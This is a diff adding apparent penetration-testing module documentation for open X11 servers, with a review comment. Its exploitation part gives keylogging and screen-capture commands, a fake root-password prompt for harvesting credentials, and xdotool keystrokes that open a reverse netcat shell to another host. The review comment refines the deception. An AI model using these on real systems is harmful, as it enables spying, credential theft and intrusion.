| 1 | +## Vulnerable Application |
| 2 | + |
| 3 | +X11 (X Window System) is a graphical windowing system most common on unix/linux, although implementations may be found in windows |
| 4 | +with software such as Hummingbird Exceed X Server. The service can accept connections from any users when misconfigured |
| 5 | +which is done with the command `xhost +`. |
| 6 | + |
| 7 | +### Ubuntu 10.04 |
| 8 | + |
| 9 | +1. `sudo nano /etc/gdm/gdm.schemas` |
| 10 | +2. Find: |
| 11 | + |
| 12 | + ``` |
| 13 | + <schema> |
| 14 | + <key>security/DisallowTCP</key> |
| 15 | + <signature>b</signature> |
| 16 | + <default>true</default> |
| 17 | + </schema> |
| 18 | + ``` |
| 19 | + - Change `true` to `false` |
| 20 | +
|
| 21 | +3. logout or reboot |
| 22 | +4. Verification: ```sudo netstat -antp | grep 6000``` |
| 23 | +
|
| 24 | + ``` |
| 25 | + tcp 0 0 0.0.0.0:6000 0.0.0.0:* LISTEN 1806/X |
| 26 | + ``` |
| 27 | +
|
| 28 | +5. Now, to verify you allow ANYONE to get on X11, type: `xhost +` |
| 29 | +
|
| 30 | +### Ubuntu 12.04, 14.04 |
| 31 | +
|
| 32 | +1. `sudo nano /etc/lightdm/lightdm.conf` |
| 33 | +2. Under the `[SeatDefaults]` area, add: |
| 34 | +
|
| 35 | + ``` |
| 36 | + xserver-allow-tcp=true |
| 37 | + allow-guest=true |
| 38 | + ``` |
| 39 | +
|
| 40 | +3. logout or reboot |
| 41 | +4. Verification: ```sudo netstat -antp | grep 6000``` |
| 42 | +
|
| 43 | + ``` |
| 44 | + tcp 0 0 0.0.0.0:6000 0.0.0.0:* LISTEN 1806/X |
| 45 | + ``` |
| 46 | +
|
| 47 | +5. Now, to verify you allow ANYONE to get on X11, type: `xhost +` |
| 48 | +
|
| 49 | +### Ubuntu 16.04 |
| 50 | +
|
| 51 | + Use the Ubuntu 12.04 instructions, however change `SeatDefaults` to `Seat:*` |
| 52 | +
|
| 53 | +### Fedora 15 |
| 54 | +
|
| 55 | +1. `vi /etc/gdm/custom.conf` |
| 56 | +2. Under the `[security]` area, add: |
| 57 | +
|
| 58 | + ``` |
| 59 | + DisallowTCP=false |
| 60 | + ``` |
| 61 | +
|
| 62 | +3. logout/reboot |
| 63 | +4. Now, to verify you allow ANYONE to get on X11, type: `xhost +` |
| 64 | +
|
| 65 | +### Solaris 10 |
| 66 | +
|
| 67 | +1. `svccfg -s svc:/application/x11/x11-server setprop options/tcp_listen = true` |
| 68 | +2. `svc disable cde-login` |
| 69 | +3. `svc enable cde-login` |
| 70 | +4. `xhost +` |
| 71 | +
|
| 72 | +## Verification Steps |
| 73 | +
|
| 74 | + 1. Install and configure X11 |
| 75 | + 2. Start msfconsole |
| 76 | + 3. Do: `use auxiliary/scanner/x11/open_x11` |
| 77 | + 4. Do: `set rhosts [IPs]` |
| 78 | + 5. Do: `run` |
| 79 | +
|
| 80 | +## Scenarios |
| 81 | +
|
| 82 | + A run against Ubuntu 14.04 (192.168.2.75), Ubuntu 16.04 (192.168.2.26), and Solaris 10 (192.168.2.32) |
| 83 | +
|
| 84 | + ``` |
| 85 | + msf > use auxiliary/scanner/x11/open_x11 |
| 86 | + msf auxiliary(open_x11) > set rhosts 192.168.2.75 192.168.2.26 |
| 87 | + rhosts => 192.168.2.75 192.168.2.26 |
| 88 | + msf auxiliary(open_x11) > run |
| 89 | + |
| 90 | + [+] 192.168.2.75:6000 - 192.168.2.75 Open X Server (The X.Org Foundation) |
| 91 | + [*] Scanned 1 of 3 hosts (33% complete) |
| 92 | + [+] 192.168.2.26:6000 - 192.168.2.26 Open X Server (The X.Org Foundation) |
| 93 | + [*] Scanned 2 of 3 hosts (66% complete) |
| 94 | + [+] 192.168.2.32:6000 - 192.168.2.32 Open X Server (Sun Microsystems, Inc.) |
| 95 | + [*] Auxiliary module execution completed |
| 96 | + ``` |
| 97 | +
|
| 98 | +## Confirming |
| 99 | +
|
| 100 | +The following are other industry tools which can also be used. |
| 101 | +
|
| 102 | +### [nmap](https://nmap.org/nsedoc/scripts/x11-access.html) |
| 103 | +
|
| 104 | +``` |
| 105 | +# nmap -p 6000 --script=x11-access 192.168.2.26,75 |
| 106 | + |
| 107 | +Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-23 13:15 EDT |
| 108 | +Nmap scan report for ubuntu-desktop-16 (192.168.2.26) |
| 109 | +Host is up (0.0021s latency). |
| 110 | +PORT STATE SERVICE |
| 111 | +6000/tcp open X11 |
| 112 | +|_x11-access: X server access is granted |
| 113 | +MAC Address: 00:0C:29:60:27:F9 (VMware) |
| 114 | + |
| 115 | +Nmap scan report for ubuntu-desktop-14 (192.168.2.75) |
| 116 | +Host is up (0.0021s latency). |
| 117 | +PORT STATE SERVICE |
| 118 | +6000/tcp open X11 |
| 119 | +|_x11-access: X server access is granted |
| 120 | +MAC Address: 00:0C:29:0E:C4:6E (VMware) |
| 121 | +``` |
| 122 | +
|
| 123 | +### xdpyinfo |
| 124 | +
|
| 125 | +This is one of the standard linux tools to get info on an X display. |
| 126 | +
|
| 127 | +``` |
| 128 | +# xdpyinfo -display 192.168.2.75:0 | head -n 5 |
| 129 | + |
| 130 | +name of display: 192.168.2.75:0 |
| 131 | +version number: 11.0 |
| 132 | +vendor string: The X.Org Foundation |
| 133 | +vendor release number: 11803000 |
| 134 | +X.Org version: 1.18.3 |
| 135 | +``` |
| 136 | +
|
| 137 | +## Exploitation |
| 138 | +
|
| 139 | +Exploiting this mis-configuration has several methods. The target can have their display viewed, keystrokes logged, and potential keyboard typed. |
| 140 | +
|
| 141 | +### Keylogging |
| 142 | +
|
| 143 | +To keylog the remote host, we use a tool called [xspy](http://tools.kali.org/sniffingspoofing/xspy) |
| 144 | +
|
| 145 | +`xspy -display [ip]:0` |
| 146 | +
|
| 147 | +### Screen Monitoring |
| 148 | +
|
| 149 | +#### Entire Display |
| 150 | +
|
| 151 | +It is possible to monitor the entire display (all windows) and view the content. |
| 152 | +
|
| 153 | + - Take a screenshot: `xwd -root -display [ip]:[display] -out xdump.xdump` |
| 154 | + - View screenshot: `display xdump.xdump` or `xwud -in xdump.xdump` |
| 155 | +
|
| 156 | +#### Specific Window |
| 157 | +
|
| 158 | +To monitor only a single window (a terminal for instance) |
| 159 | +
|
| 160 | +First, we need to determine which windows are available and what their processes are: |
| 161 | +
|
| 162 | + - `xwininfo -tree -root -display [ip]:0` |
| 163 | + |
| 164 | +Once you determine which window you want to monitor, you'll want to use the `windowID`. Now use the application `xwatchwin` |
| 165 | +
|
| 166 | + - `xwatchwin [ip]:0 -w [windowID]` |
| 167 | +
|
| 168 | +### Social Engineering |
| 169 | +
|
| 170 | +Obviously watching keystrokes is good, but we want to coax the user into providing their password. We can do this by using xterm to display a login box to the user. |
| 171 | +
|
| 172 | +This was tested against Ubuntu 12.04, 14.04, 16.04 and Solaris 10. |
| 173 | +
|
| 174 | +1. start `xspy` |
| 175 | +2. `xterm -T "Root Permission Required" -display [ip]:0 -e "echo -e -n 'root password: '; read passwd; echo 'Authentication Failure'; echo -e -n 'root password: '; read passwd"` |
| 176 | + - Notice it asks twice for the password incase of a mistyped initial password. This can also be adjusted to just say password or the real user's username |
| 177 | + - The victim's typed text by the user will not be masked (`*`) |
| 178 | +
|
| 179 | +### Direct Exploitation |
| 180 | +
|
| 181 | +Use `exploits/unix/x11/x11_keyboard_exec` |
| 182 | +
|
| 183 | +### Typing Commands |
| 184 | +
|
| 185 | +Similar to the method `exploits/unix/x11/x11_keyboard_exec` uses, its possible to use `xdotool` to run commands on the remote system. |
| 186 | +
|
| 187 | +To install `xdotool` on kali simply run `apt-get install xdotool` |
| 188 | +
|
| 189 | +Now, you can directly interact by typing commands (which appear on the users screen), an example would be running xterm and launching netcat. |
| 190 | +
|
| 191 | +For this scenario we run a simple reverse netcat to 192.168.2.9:80 |
| 192 | +
|
| 193 | +``` |
| 194 | +xdotool key alt+F2 |
| 195 | +xdotool key x t e r m |
| 196 | +xdotool key KP_Enter |
| 197 | +xdotool key n c space 1 9 2 period 1 6 8 period 2 period 9 space 8 0 space minus e space slash b i n slash b a s h KP_Enter |
| 198 | +``` |
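Review bot: the Solaris 10 restart steps `svc disable cde-login` / `svc enable cde-login` (diff lines 68-69) will fail as written, since `svc` is not an SMF command; use `svcadm disable cde-login` and `svcadm enable cde-login` (or one `svcadm restart cde-login`) so the login service is restarted and the `options/tcp_listen` property set in line 67 takes effect. Second, `xhost +` (lines 28, 47, 63, 70) is presented as a verification step, but it is the step that disables host-based access control; it has to be typed inside the victim's logged-in X session after the reboot (it acts on the running server and does not survive logout), and the actual check is a bare `xhost`, which should print `access control disabled, clients can connect from any host`. Third, the scenario at line 86 does `set rhosts 192.168.2.75 192.168.2.26` but the transcript reports `Scanned 1 of 3 hosts` and a hit on `192.168.2.32`; add the Solaris host to the `set rhosts` line so the example is consistent. Fourth, the xdotool block at lines 194-197 never points xdotool at the victim; it acts on whatever `DISPLAY` is set in the attacker's shell, so prefix the commands with `DISPLAY=[ip]:0` (and note that `alt+F2` is a GNOME/Unity run-dialog keybinding, so the Solaris CDE desktop needs another way of opening a terminal). Finally, for the fake prompt at line 175, `read -s passwd` would hide the victim's typing the way a real password prompt does while xspy still captures the keystrokes; the command runs under the victim's login shell, so `-s` is available on the Ubuntu bash targets but not in Solaris 10's Bourne `/bin/sh` unless that user's shell is bash.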